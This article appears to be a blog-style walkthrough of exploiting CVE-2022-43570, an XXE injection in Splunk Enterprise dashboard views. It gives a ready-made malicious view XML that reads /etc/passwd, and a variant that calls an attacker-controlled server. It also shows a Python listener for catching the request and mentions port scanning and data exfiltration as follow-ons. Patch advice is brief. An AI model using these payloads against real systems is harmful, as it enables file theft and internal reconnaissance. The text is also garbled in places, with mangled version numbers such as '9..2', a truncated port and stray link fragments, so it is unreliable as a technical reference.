CVE-2022-43570 - Exploiting Splunk Enterprise – How XXE Injection Lets Attackers Leak Data

Splunk Enterprise is one of the most popular platforms for searching, monitoring, and analyzing machine-generated big data. But sometimes, security vulnerabilities pop up even in big, trustworthy platforms. CVE-2022-43570 is one such flaw. In this article, we’ll break down what it is, how it works, and show you step-by-step how an attacker can use a seemingly harmless XML feature to expose sensitive information in Splunk.

What is CVE-2022-43570?

CVE-2022-43570 is an XML External Entity (XXE) Injection bug_Processing) discovered in Splunk Enterprise versions below 8.1.12, 8.2.9, and 9..2. If a logged-in user can upload or create custom “Views” (a Splunk feature for making dashboards), they can trick Splunk Web into parsing XML with dangerous external entities.

In plain English: an attacker makes Splunk’s View system read files on the server or send secret data to an outside server just by uploading some crafty XML code.

Official References

- Splunk Security Advisory: SVD-2022-1107 - Splunk Enterprise XML External Entity Injection
- CVE Database Entry: NIST NVD - CVE-2022-43570
- XXE explained: OWASP XXE Cheat Sheet

Entities in XML look like this

<!ENTITY secret SYSTEM "file:///etc/passwd">

That line says, “wherever you see &secret;, replace it with the contents of /etc/passwd.” If the parser processes it, it might leak files from the server.

Write a view XML that loads an external file

<?xml version="1." encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<view>
  <label>Malicious XXE View</label>
  <description>&xxe;</description>
  <row>
    <panel>
      <html>
        <![CDATA[
          <div>Splunk is leaking: &xxe;</div>
        ]]>
      </html>
    </panel>
  </row>
</view>

*What does this do?*
When Splunk parses this view, it will try to replace &xxe; with the contents of /etc/passwd. On error, Splunk Web might show this data in error messages.

Get the Data

If successful, Splunk’s web UI will crash or error, showing the file you targeted, like parts of /etc/passwd, in the error detail.

You can also force Splunk to fetch files _from_ your server using a URL. Example

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://your-attacker-server.com/data">;
]>
<view>
  ...
  <description>&xxe;</description>
  ...
</view>

Set up a simple web server (Python)

python3 -m http.server 800

When the Splunk server tries to load the View, it will make a request to you. Now you know at least the server made the request—and sometimes you grab more info from request headers.

Reading server files (like passwords, configs)

- Port scanning (using file:// or http:// to knock on server addresses)
- Sending data to attackers (even if Splunk can't resolve the reference, error messages could leak data into error logs or the UI)

Upgrade! Splunk patched XXE in 8.1.12, 8.2.9, 9..2.

- Limit who can edit/upload views.

Summary

CVE-2022-43570 is a real-world example of how “just XML” can turn lethal in the wrong hands. All the attacker needs is a Splunk login and “View” permissions. And while later versions are safe, millions still run outdated Splunk.

If you have Splunk, please patch ASAP.
If you’re a pentester, try this on test labs (never on live systems you don’t own) and report responsibly.

Further Reading

- Splunk Blog: Security Advisories
- OWASP: XXE Basics_Processing)
- Mitre CVE Entry

Stay safe! If you found this helpful, don’t forget to test your Splunk—and all your XML endpoints—for XXE. Let’s keep our logs secure.

Timeline

Published on: 11/04/2022 23:15:00 UTC
Last modified on: 11/08/2022 19:43:00 UTC